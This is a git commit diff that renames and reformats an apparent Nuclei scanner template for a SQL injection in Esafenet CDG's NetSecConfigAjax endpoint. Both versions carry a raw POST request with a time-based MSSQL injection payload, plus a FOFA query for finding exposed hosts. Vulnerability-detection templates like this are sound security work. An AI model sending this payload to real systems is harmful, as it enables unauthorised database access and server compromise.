Update and rename esafenet-NetSecConfigAjax-Sqli.yaml to esafenet-netsecconfigajax-sqli.yaml

2024-07-24 16:43:23 +05:30 · 2024-07-24 16:43:23 +05:30 · 9ecee1206b
parent 548c10c720
commit 9ecee1206b
2 changed files with 31 additions and 38 deletions
--- a/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml
+++ b/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml
@ -1,38 +0,0 @@
-id: esafenet-NetSecConfigAjax-Sqli
-
-info:
-  name: Esafenet CDG NetSecConfigAjax - Sql Injection
-  author: adeljck
-  severity: high
-  description: |
-    CDGServer3 NetSecConfigAjax Interface Sql Injection.
-  metadata:
-    verified: true
-    max-request: 1
-    fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
-    hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/"
-    product: electronic_document_security_management_system
-    vendor: esafenet
-  tags: esafenet,sqli
-
-http:
-  - raw:
-      - |
-        POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
-
-        command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
-    max-size: 1000
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "操作成功"
-        condition: and
-
-      - type: status
-        status:
-          - 200
--- a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
+++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
@ -0,0 +1,31 @@
+id: esafenet-netsecconfigajax-sqli
+
+info:
+  name: Esafenet CDG NetSecConfigAjax - Sql Injection
+  author: adeljck
+  severity: high
+  description: |
+    The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
+  metadata:
+    verified: true
+    vendor: esafenet
+    max-request: 1
+    fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
+  tags: esafenet,sqli
+
+http:
+  - raw:
+    - |
+      POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(content_type,"text/html")'
+          - 'contains(body,"操作成功")'
+          - 'status_code == 200'
+        condition: and